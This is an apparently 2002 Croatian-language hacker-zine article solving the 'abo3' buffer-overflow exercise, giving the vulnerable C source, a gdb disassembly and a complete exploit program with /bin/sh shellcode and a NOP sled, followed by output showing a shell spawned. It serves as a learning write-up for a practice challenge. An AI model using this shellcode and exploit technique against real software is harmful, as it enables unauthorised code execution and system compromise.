[ The Cult Of Freedom ] --[ By Fr1c [fr1c@phreakcore.org] --[ PhreakCore.ORG - 2002 --[ Subject : BufferOverflows - Little bit of thinking! (abo3) --[ 0x01 ]---- Pocetak : Imao sam malo vremena, pa sam odlucio da napisem koji txt ... pri ruci su mi bili ovi abo-i pa eto...:) Heh, vjerojatno su nekima vec dosadili bufferoverflowi tj. explojtanje ovih jednostavnih primjera ... i meni vec :) Hm, al vidim da su neki bili/su zagrijani za one ABO sa core-sdi.com ... Objasnio sam zast nije moguce explojtat ABO2 (vjerojatno su svi rijesili abo1:) ) ... tj. abo2 nije moguce na x86 platformi, ali na RISC je moguce... Anyway, malo sam uzeo abo3 i pogledao... --[ 0x02 ]---- Rad : U biti je jednostavno pa evo, ja sam rijesio ... Ovako ide source : === CUT HERE === /* abo3.c * * specially crafted to feed your brain by gera@core-sdi.com */ /* This'll prepare you for The Next Step */ int main(int argv,char **argc) { extern system,puts; void (*fn)(char*)=(void(*)(char*))&system; char buf[256]; fn=(void(*)(char*))&puts; strcpy(buf,argc[1]); fn(argc[2]); exit(1); } === CUT HERE === Ovako...ajmo malo analizirat ... Ako vas zbunjuje code, go back and read C tuts about pointers! Uglavnom, vidimo opet, da, moguce je napunit 'buf', ali od toga nemamo koristi jer se prepisani EIP nece izvrsit ... Hm, da vidimo ...ovdje imamo pointer na funkciju. (fn). I ta funkcija se izvrsava prije exit() ... hm, cini se da je to nas izlaz odavde. Hm, da vidimo malo disassm : (gdb) disas main Dump of assembler code for function main: 0x8048500
: push %ebp 0x8048501 : mov %esp,%ebp 0x8048503 : sub $0x118,%esp 0x8048509 : movl $0x8048384,0xfffffff4(%ebp) 0x8048510 : movl $0x8048394,0xfffffff4(%ebp) 0x8048517 : sub $0x8,%esp 0x804851a : mov 0xc(%ebp),%eax 0x804851d : add $0x4,%eax 0x8048520 : pushl (%eax) 0x8048522 : lea 0xfffffee8(%ebp),%eax 0x8048528 : push %eax 0x8048529 : call 0x80483e4 0x804852e : add $0x10,%esp 0x8048531 : sub $0xc,%esp 0x8048534 : mov 0xc(%ebp),%eax 0x8048537 : add $0x8,%eax 0x804853a : pushl (%eax) 0x804853c : mov 0xfffffff4(%ebp),%eax 0x804853f : call *%eax <-- na ovo ciljamo! 0x8048541 : add $0x10,%esp 0x8048544 : sub $0xc,%esp 0x8048547 : push $0x1 0x8048549 : call 0x80483d4 0x804854e : mov %esi,%esi End of assembler dump. (gdb) Hm, da ... mogli bi probat prepisat povratnu adresu ove funkcije ... Nego, evo moj solution, malo analizirajte pa skuzite ...vrlo je jednostavan. === CUT HERE === /* Solution for ABO3.C * By Fr1c [PhreakCore] */ #include #include #include #define SIZE 272 /* got from predator ( i think :) )! */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp, %eax"); } int main(void) { char buffer[SIZE]; int i; unsigned long ret = get_esp()-87; for (i = 0; i < SIZE; i+=4) *(long *)&buffer[i] = ret; memset(buffer, 0x90, 200); memcpy(buffer+200, shellcode, strlen(shellcode)); printf("Fritz-Lab\nExploiting abo3!\n"); execl("./abo3", "abo3", buffer, NULL); return 0; } === CUT HERE === Heh, no emails about this plz ... :)) [fritz@fritz-lab ]$ ./abo3x Fritz-Lab Exploiting abo3! sh-2.04$ b00m ... looks like it's working ...!? :) take care .... -------- Greetz : uf, sorry, umoran sam ... ne sjecam se niti svog nick-a :)))